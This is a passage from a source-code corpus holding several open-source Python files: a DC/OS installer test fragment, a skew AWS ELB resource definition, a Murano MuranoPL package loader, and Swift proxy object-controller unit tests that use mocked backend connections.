    complete_json = '{"bootstrap": "12345", "packages": ["package--version"]}'
    for latest_name in ('test_variant.complete.latest.json', 'complete.latest.json'):
        tmpdir.join('artifacts/complete', latest_name).write(complete_json, ensure=True)

    tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
| darkonie/dcos | dcos_installer/test_backend.py | Python | apache-2.0 | 12,196 |
# Copyright (c) 2014 Scopely, Inc.
# Copyright (c) 2015 Mitch Garnaat
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from skew.resources.aws import AWSResource
class LoadBalancer(AWSResource):
    """skew resource mapping for Classic ELB load balancers (service `elb`)."""

    class Meta(object):
        # Declarative description of how skew enumerates and identifies
        # this resource type via the AWS API.
        service = 'elb'
        type = 'loadbalancer'
        # (API operation, key of the result list, extra request kwargs).
        enum_spec = ('describe_load_balancers',
                     'LoadBalancerDescriptions', None)
        detail_spec = None
        id = 'LoadBalancerName'
        filter_name = 'LoadBalancerNames'
        filter_type = 'list'
        name = 'DNSName'
        date = 'CreatedTime'
        # NOTE(review): presumably the CloudWatch metric dimension key for
        # this resource — confirm against the AWSResource base class.
        dimension = 'LoadBalancerName'
        # (API operation, JMESPath to the tags, request param, attr to send).
        tags_spec = ('describe_tags', 'TagDescriptions[].Tags[]',
                     'LoadBalancerNames', 'id')
| ryandub/skew | skew/resources/aws/elb.py | Python | apache-2.0 | 1,155 |
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
import yaml
import murano.packages.application_package
from murano.packages import exceptions
class MuranoPlPackage(murano.packages.application_package.ApplicationPackage):
    """Application package whose classes and UI are MuranoPL YAML files.

    Class definitions live under <source_directory>/Classes and the
    optional dynamic-UI definition under <source_directory>/UI.  Both
    are loaded lazily and cached on first access.
    """
    def __init__(self, source_directory, manifest, loader):
        super(MuranoPlPackage, self).__init__(
            source_directory, manifest, loader)
        # Mapping of class name -> definition file name; expected to be
        # populated externally by the package loader before use.
        self._classes = None
        # Name of the UI definition file inside the UI directory.
        self._ui = None
        # Parsed (YAML) and raw (text) UI caches.
        self._ui_cache = None
        self._raw_ui_cache = None
        # Parsed class definitions keyed by class name.
        self._classes_cache = {}
    @property
    def classes(self):
        """Names of all MuranoPL classes defined by this package."""
        return tuple(self._classes.keys())
    @property
    def ui(self):
        """Parsed UI definition, loaded on first access (None if absent)."""
        if not self._ui_cache:
            self._load_ui(True)
        return self._ui_cache
    @property
    def raw_ui(self):
        """Raw UI definition text, loaded on first access (None if absent)."""
        if not self._raw_ui_cache:
            self._load_ui(False)
        return self._raw_ui_cache
    def get_class(self, name):
        """Return the parsed definition of class ``name``, caching it.

        Raises PackageClassLoadError if the class is not declared by the
        package or its definition file is missing/unparsable.
        """
        if name not in self._classes_cache:
            self._load_class(name)
        return self._classes_cache[name]
    # Private methods
    def _load_ui(self, load_yaml=False):
        # Reuse the raw cache when only the parsed form is missing;
        # otherwise read UI/<ui_file> from disk.
        if self._raw_ui_cache and load_yaml:
            self._ui_cache = yaml.load(self._raw_ui_cache, self.yaml_loader)
        else:
            ui_file = self._ui
            full_path = os.path.join(self._source_directory, 'UI', ui_file)
            if not os.path.isfile(full_path):
                # A UI definition is optional: a missing file means "no UI".
                self._raw_ui_cache = None
                self._ui_cache = None
                return
            try:
                with open(full_path) as stream:
                    self._raw_ui_cache = stream.read()
                    if load_yaml:
                        self._ui_cache = yaml.load(self._raw_ui_cache,
                                                   self.yaml_loader)
            except Exception as ex:
                # Python 2 three-expression raise: keep the original
                # traceback while converting to a package-level error.
                trace = sys.exc_info()[2]
                raise exceptions.PackageUILoadError(str(ex)), None, trace
    def _load_class(self, name):
        # Resolve Classes/<def_file> for ``name`` and parse it into
        # self._classes_cache.
        if name not in self._classes:
            raise exceptions.PackageClassLoadError(
                name, 'Class not defined in this package')
        def_file = self._classes[name]
        full_path = os.path.join(self._source_directory, 'Classes', def_file)
        if not os.path.isfile(full_path):
            raise exceptions.PackageClassLoadError(
                name, 'File with class definition not found')
        try:
            with open(full_path) as stream:
                self._classes_cache[name] = yaml.load(stream, self.yaml_loader)
        except Exception as ex:
            # Preserve the original traceback (Python 2 raise form).
            trace = sys.exc_info()[2]
            msg = 'Unable to load class definition due to "{0}"'.format(
                str(ex))
            raise exceptions.PackageClassLoadError(name, msg), None, trace
    def validate(self):
        """Eagerly load every class and the UI to surface load errors."""
        self._classes_cache.clear()
        for class_name in self._classes:
            self.get_class(class_name)
        self._load_ui(True)
        super(MuranoPlPackage, self).validate()
| ativelkov/murano-api | murano/packages/mpl_package.py | Python | apache-2.0 | 3,570 |
#!/usr/bin/env python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import random
import time
import unittest
from contextlib import contextmanager
import mock
from eventlet import Timeout
import swift
from swift.common import utils, swob
from swift.proxy import server as proxy_server
from swift.common.storage_policy import StoragePolicy, POLICIES
from test.unit import FakeRing, FakeMemcache, fake_http_connect, \
debug_logger, patch_policies
from test.unit.proxy.test_server import node_error_count
@contextmanager
def set_http_connect(*args, **kwargs):
    """Temporarily replace http_connect in every proxy controller module.

    Installs a fake_http_connect built from ``args``/``kwargs``, yields
    it, and — when the with-body exits cleanly — asserts that every
    queued status code was consumed.  The real http_connect is always
    restored on exit.
    """
    target_modules = (swift.proxy.controllers.base,
                      swift.proxy.controllers.obj,
                      swift.proxy.controllers.account,
                      swift.proxy.controllers.container)
    real_connect = swift.proxy.controllers.base.http_connect
    fake_connect = fake_http_connect(*args, **kwargs)
    try:
        for module in target_modules:
            module.http_connect = fake_connect
        yield fake_connect
        # Any statuses still queued mean the test expected more backend
        # requests than actually happened.
        unused_codes = list(fake_connect.code_iter)
        if unused_codes:
            raise AssertionError('left over status %r' % unused_codes)
    finally:
        for module in target_modules:
            module.http_connect = real_connect
class PatchedObjControllerApp(proxy_server.Application):
    """Proxy app that substitutes a stub ObjectController per request.

    handle_request is wrapped so that whatever class is stored in the
    ``object_controller`` attribute is what proxy_server.get_controller
    hands back, letting tests inject (possibly stubbed) controllers.
    """
    object_controller = proxy_server.ObjectController

    def handle_request(self, req):
        controller_patch = mock.patch(
            'swift.proxy.server.ObjectController',
            new=self.object_controller)
        with controller_patch:
            return super(PatchedObjControllerApp, self).handle_request(req)
@patch_policies([StoragePolicy(0, 'zero', True,
                               object_ring=FakeRing(max_more_nodes=9))])
class TestObjControllerWriteAffinity(unittest.TestCase):
    # Exercises iter_nodes_local_first and connect-timeout handling on
    # the object controller under a single (default) storage policy.
    def setUp(self):
        # App over all-fake rings; request_node_count is effectively
        # unbounded so the full iteration (primaries + handoffs) is seen.
        self.app = proxy_server.Application(
            None, FakeMemcache(), account_ring=FakeRing(),
            container_ring=FakeRing(), logger=debug_logger())
        self.app.request_node_count = lambda ring: 10000000
        self.app.sort_nodes = lambda l: l  # stop shuffling the primary nodes
    def test_iter_nodes_local_first_noops_when_no_affinity(self):
        # With no write-affinity function configured, the local-first
        # iterator must yield exactly the ring's own ordering.
        controller = proxy_server.ObjectController(self.app, 'a', 'c', 'o')
        self.app.write_affinity_is_local_fn = None
        object_ring = self.app.get_object_ring(None)
        all_nodes = object_ring.get_part_nodes(1)
        all_nodes.extend(object_ring.get_more_nodes(1))
        local_first_nodes = list(controller.iter_nodes_local_first(
            object_ring, 1))
        self.maxDiff = None
        self.assertEqual(all_nodes, local_first_nodes)
    def test_iter_nodes_local_first_moves_locals_first(self):
        # Region-1 nodes are "local"; with write_affinity_node_count of 4
        # they must be moved to the front without dropping any node.
        controller = proxy_server.ObjectController(self.app, 'a', 'c', 'o')
        self.app.write_affinity_is_local_fn = (
            lambda node: node['region'] == 1)
        self.app.write_affinity_node_count = lambda ring: 4
        object_ring = self.app.get_object_ring(None)
        all_nodes = object_ring.get_part_nodes(1)
        all_nodes.extend(object_ring.get_more_nodes(1))
        local_first_nodes = list(controller.iter_nodes_local_first(
            object_ring, 1))
        # the local nodes move up in the ordering
        self.assertEqual([1, 1, 1, 1],
                         [node['region'] for node in local_first_nodes[:4]])
        # we don't skip any nodes
        self.assertEqual(len(all_nodes), len(local_first_nodes))
        self.assertEqual(sorted(all_nodes), sorted(local_first_nodes))
    def test_connect_put_node_timeout(self):
        # A connect slower than conn_timeout must make _connect_put_node
        # give up on the node and return None.
        controller = proxy_server.ObjectController(self.app, 'a', 'c', 'o')
        self.app.conn_timeout = 0.05
        with set_http_connect(slow_connect=True):
            nodes = [dict(ip='', port='', device='')]
            res = controller._connect_put_node(nodes, '', '', {}, ('', ''))
        self.assertTrue(res is None)
@patch_policies([
StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(2, 'two'),
])
class TestObjController(unittest.TestCase):
container_info = {
'partition': 1,
'nodes': [
{'ip': '127.0.0.1', 'port': '1', 'device': 'sda'},
{'ip': '127.0.0.1', 'port': '2', 'device': 'sda'},
{'ip': '127.0.0.1', 'port': '3', 'device': 'sda'},
],
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
    def setUp(self):
        # setup fake rings with handoffs; every policy shares one ring so
        # tests can size responses off self.obj_ring alone
        self.obj_ring = FakeRing(max_more_nodes=3)
        for policy in POLICIES:
            policy.object_ring = self.obj_ring
        logger = debug_logger('proxy-server')
        logger.thread_locals = ('txn1', '127.0.0.2')
        self.app = PatchedObjControllerApp(
            None, FakeMemcache(), account_ring=FakeRing(),
            container_ring=FakeRing(), logger=logger)
        class FakeContainerInfoObjController(proxy_server.ObjectController):
            # Serve the test's canned container_info dict instead of
            # performing a real container lookup.
            def container_info(controller, *args, **kwargs):
                patch_path = 'swift.proxy.controllers.base.get_info'
                with mock.patch(patch_path) as mock_get_info:
                    mock_get_info.return_value = dict(self.container_info)
                    return super(FakeContainerInfoObjController,
                                 controller).container_info(*args, **kwargs)
        # this is taking advantage of the fact that self.app is a
        # PatchedObjControllerApp, so handle_request will route into an
        # instance of our FakeContainerInfoObjController just by
        # overriding the class attribute for object_controller
        self.app.object_controller = FakeContainerInfoObjController
def test_PUT_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
def test_PUT_if_none_match(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
def test_PUT_if_none_match_denied(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 412, 201):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 412)
def test_PUT_if_none_match_not_star(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = 'somethingelse'
req.headers['content-length'] = '0'
with set_http_connect():
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 400)
    def test_PUT_connect_exceptions(self):
        # Verifies that PUT still succeeds when individual nodes fail in
        # various ways (error status, connect timeout, exception, expect
        # failure, response failure) and that exactly the right node has
        # its error counter bumped each time.
        object_ring = self.app.get_object_ring(None)
        self.app.sort_nodes = lambda n: n  # disable shuffle
        def test_status_map(statuses, expected):
            # Reset error limiting between sub-cases so counts isolate.
            self.app._error_limiting = {}
            req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
                                     body='test body')
            with set_http_connect(*statuses):
                resp = req.get_response(self.app)
            self.assertEqual(resp.status_int, expected)
        base_status = [201] * 3
        # test happy path
        test_status_map(list(base_status), 201)
        for i in range(3):
            self.assertEqual(node_error_count(
                self.app, object_ring.devs[i]), 0)
        # single node errors and test isolation
        for i in range(3):
            status_list = list(base_status)
            status_list[i] = 503
            test_status_map(status_list, 201)
            for j in range(3):
                self.assertEqual(node_error_count(
                    self.app, object_ring.devs[j]), 1 if j == i else 0)
        # connect errors: a fourth (handoff) status is consumed because
        # the failed primary is replaced
        test_status_map((201, Timeout(), 201, 201), 201)
        self.assertEqual(node_error_count(
            self.app, object_ring.devs[1]), 1)
        test_status_map((Exception('kaboom!'), 201, 201, 201), 201)
        self.assertEqual(node_error_count(
            self.app, object_ring.devs[0]), 1)
        # expect errors (failure during the 100-continue phase)
        test_status_map((201, 201, (503, None), 201), 201)
        self.assertEqual(node_error_count(
            self.app, object_ring.devs[2]), 1)
        # 507 (insufficient storage) error-limits the node immediately
        test_status_map(((507, None), 201, 201, 201), 201)
        self.assertEqual(
            node_error_count(self.app, object_ring.devs[0]),
            self.app.error_suppression_limit + 1)
        # response errors (failure after the 100-continue succeeded)
        test_status_map(((100, Timeout()), 201, 201), 201)
        self.assertEqual(
            node_error_count(self.app, object_ring.devs[0]), 1)
        test_status_map((201, 201, (100, Exception())), 201)
        self.assertEqual(
            node_error_count(self.app, object_ring.devs[2]), 1)
        test_status_map((201, (100, 507), 201), 201)
        self.assertEqual(
            node_error_count(self.app, object_ring.devs[1]),
            self.app.error_suppression_limit + 1)
def test_GET_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_GET_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(503, 200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_GET_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [503] * self.obj_ring.replicas + [200]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_GET_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [404] * (self.obj_ring.replicas +
self.obj_ring.max_more_nodes)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 404)
def test_DELETE_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(204, 204, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_DELETE_missing_one(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 204, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_DELETE_half_not_found_statuses(self):
self.obj_ring.set_replicas(4)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 204, 404, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_DELETE_half_not_found_headers_and_body(self):
# Transformed responses have bogus bodies and headers, so make sure we
# send the client headers and body from a real node's response.
self.obj_ring.set_replicas(4)
status_codes = (404, 404, 204, 204)
bodies = ('not found', 'not found', '', '')
headers = [{}, {}, {'Pick-Me': 'yes'}, {'Pick-Me': 'yes'}]
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(*status_codes, body_iter=bodies,
headers=headers):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('Pick-Me'), 'yes')
self.assertEquals(resp.body, '')
def test_DELETE_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 404, 204):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 404)
def test_DELETE_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.obj_ring.replicas
with set_http_connect(507, *codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 204)
def test_POST_as_COPY_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='POST')
head_resp = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
put_resp = [201] * self.obj_ring.replicas
codes = head_resp + put_resp
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 202)
def test_POST_delete_at(self):
t = str(int(time.time() + 100))
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
post_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'POST':
post_headers.append(headers)
x_newest_responses = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
post_resp = [200] * self.obj_ring.replicas
codes = x_newest_responses + post_resp
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
for given_headers in post_headers:
self.assertEquals(given_headers.get('X-Delete-At'), t)
self.assertTrue('X-Delete-At-Host' in given_headers)
self.assertTrue('X-Delete-At-Device' in given_headers)
self.assertTrue('X-Delete-At-Partition' in given_headers)
self.assertTrue('X-Delete-At-Container' in given_headers)
def test_POST_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_POST_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_POST_delete_at_non_integer(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_POST_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_PUT_converts_delete_after_to_delete_at(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '60'})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
t = time.time()
with set_http_connect(*codes, give_connect=capture_headers):
with mock.patch('time.time', lambda: t):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
expected_delete_at = str(int(t) + 60)
for given_headers in put_headers:
self.assertEquals(given_headers.get('X-Delete-At'),
expected_delete_at)
self.assertTrue('X-Delete-At-Host' in given_headers)
self.assertTrue('X-Delete-At-Device' in given_headers)
self.assertTrue('X-Delete-At-Partition' in given_headers)
self.assertTrue('X-Delete-At-Container' in given_headers)
def test_PUT_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_PUT_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_PUT_delete_at(self):
t = str(int(time.time() + 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
for given_headers in put_headers:
self.assertEquals(given_headers.get('X-Delete-At'), t)
self.assertTrue('X-Delete-At-Host' in given_headers)
self.assertTrue('X-Delete-At-Device' in given_headers)
self.assertTrue('X-Delete-At-Partition' in given_headers)
self.assertTrue('X-Delete-At-Container' in given_headers)
def test_PUT_delete_at_non_integer(self):
t = str(int(time.time() - 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_PUT_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_container_sync_put_x_timestamp_not_found(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp(time.time()).normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_container_sync_put_x_timestamp_match(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp(time.time()).normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
ts_iter = itertools.repeat(put_timestamp)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_older(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.container_info['storage_policy'] = policy_index
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': ts.next().internal})
ts_iter = itertools.repeat(ts.next().internal)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_newer(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
orig_timestamp = ts.next().internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': ts.next().internal})
ts_iter = itertools.repeat(orig_timestamp)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_container_sync_delete(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
req = swob.Request.blank(
'/v1/a/c/o', method='DELETE', headers={
'X-Timestamp': ts.next().internal})
codes = [409] * self.obj_ring.replicas
ts_iter = itertools.repeat(ts.next().internal)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 409)
def test_put_x_timestamp_conflict(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': ts.next().internal})
ts_iter = iter([ts.next().internal, None, None])
codes = [409] + [201] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = ts.next().internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# object nodes they respond 409 because another in-flight request
# finished and now the on disk timestamp is equal to the request.
put_ts = [put_timestamp] * self.obj_ring.replicas
codes = [409] * self.obj_ring.replicas
ts_iter = iter(put_ts)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_unsynced_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = ts.next().internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# only one in-flight request finished
put_ts = [None] * (self.obj_ring.replicas - 1)
put_resp = [201] * (self.obj_ring.replicas - 1)
put_ts += [put_timestamp]
put_resp += [409]
ts_iter = iter(put_ts)
codes = put_resp
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_COPY_simple(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
head_resp = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
put_resp = [201] * self.obj_ring.replicas
codes = head_resp + put_resp
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 201)
def test_HEAD_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_HEAD_x_newest(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
with set_http_connect(200, 200, 200):
resp = req.get_response(self.app)
self.assertEquals(resp.status_int, 200)
def test_HEAD_x_newest_different_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
timestamps = [next(ts) for i in range(3)]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(200, 200, 200,
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-timestamp'], newest_timestamp.normal)
def test_HEAD_x_newest_with_two_vector_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(time.time(), offset=offset)
for offset in itertools.count())
timestamps = [next(ts) for i in range(3)]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(200, 200, 200,
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-backend-timestamp'],
newest_timestamp.internal)
def test_HEAD_x_newest_with_some_missing(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
request_count = self.app.request_node_count(self.obj_ring.replicas)
backend_response_headers = [{
'x-timestamp': next(ts).normal,
} for i in range(request_count)]
responses = [404] * (request_count - 1)
responses.append(200)
request_log = []
def capture_requests(ip, port, device, part, method, path,
headers=None, **kwargs):
req = {
'ip': ip,
'port': port,
'device': device,
'part': part,
'method': method,
'path': path,
'headers': headers,
}
request_log.append(req)
with set_http_connect(*responses,
headers=backend_response_headers,
give_connect=capture_requests):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
for req in request_log:
self.assertEqual(req['method'], 'HEAD')
self.assertEqual(req['path'], '/a/c/o')
def test_PUT_log_info(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['x-copy-from'] = 'some/where'
req.headers['Content-Length'] = 0
# override FakeConn default resp headers to keep log_info clean
resp_headers = {'x-delete-at': None}
head_resp = [200] * self.obj_ring.replicas + \
[404] * self.obj_ring.max_more_nodes
put_resp = [201] * self.obj_ring.replicas
codes = head_resp + put_resp
with set_http_connect(*codes, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
self.assertEquals(
req.environ.get('swift.log_info'), ['x-copy-from:some/where'])
# and then check that we don't do that for originating POSTs
req = swift.common.swob.Request.blank('/v1/a/c/o')
req.method = 'POST'
req.headers['x-copy-from'] = 'else/where'
with set_http_connect(*codes, headers=resp_headers):
